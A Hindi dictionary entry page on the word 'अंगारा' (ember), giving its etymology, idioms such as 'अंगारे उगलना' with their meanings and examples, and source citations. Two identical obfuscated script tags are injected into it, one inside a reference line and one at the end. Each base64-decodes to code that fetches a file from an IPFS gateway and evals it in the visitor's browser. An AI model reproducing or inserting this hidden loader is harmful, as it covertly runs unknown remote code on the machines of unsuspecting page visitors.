अंगारा
अंगारा - संज्ञा पुल्लिंग (संस्कृत अङ्गारक प्राकृत अंगारअ)[१]
'अंगार'
मुहावरा
अंगारा बनना = क्रोध के कारण मुंह लाल होना, गुस्से में होना।
अंगारा हो जाना = 'अंगारा बनना'
अंगारा होना = क्रोध से लाल होना।
अंगारे उगलना = कटु वचन कहना, जली कटी सुनाना।
अंगारे फाँकना = असह्य फल देने वाला काम करना।
अंगारे बरसना = 1. अत्यंत अधिक गर्मी पड़ना, आग बरसना। 2. दैवी कोप होना।
अंगारों पर पैर रखना = 1. जान बूझकर हानिकारक कार्य करना या अपने को संकट में डालना। 2. जमीन पर पैर न रखना, इतरा कर चलना।
अंगारों पर लोटना = 1. अत्यंत रोष प्रकट करना, आग बबूला होना, झल्लाना। 2. डाह से जलना, ईर्ष्या से व्याकुल होना। उदाहरण - 'वह मेरे बच्चे को देखकर अंगारों पर लोट गई'। 3. तड़पना, व्याकुल होना। उदाहरण - 'शाम से ही लोटना है मुझको अंगारों पे आज।'[२]
अंगारों पर लोटना = 1. जलाना, दाह करना। 2. तड़पाना, दु:खी करना।
लाल अंगारा = 1. बहुत लाल, खुब सुर्ख। उदाहरण - 'काटने पर तरबूज लाल अंगारा निकला'। 2. अत्यंत क्रुद्ध, उदाहरण - यह सुनते ही वह लाल अंगारा हो गयी।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ हिंदी शब्दसागर, प्रथम भाग |लेखक: श्यामसुंदरदास बी. ए. |प्रकाशक: नागरी मुद्रण, वाराणसी |पृष्ठ संख्या: 09 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
- ↑ शेर ओ सुखन, भाग 1, पृ. 659
संबंधित लेख
वर्णमाला क्रमानुसार लेख खोज
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>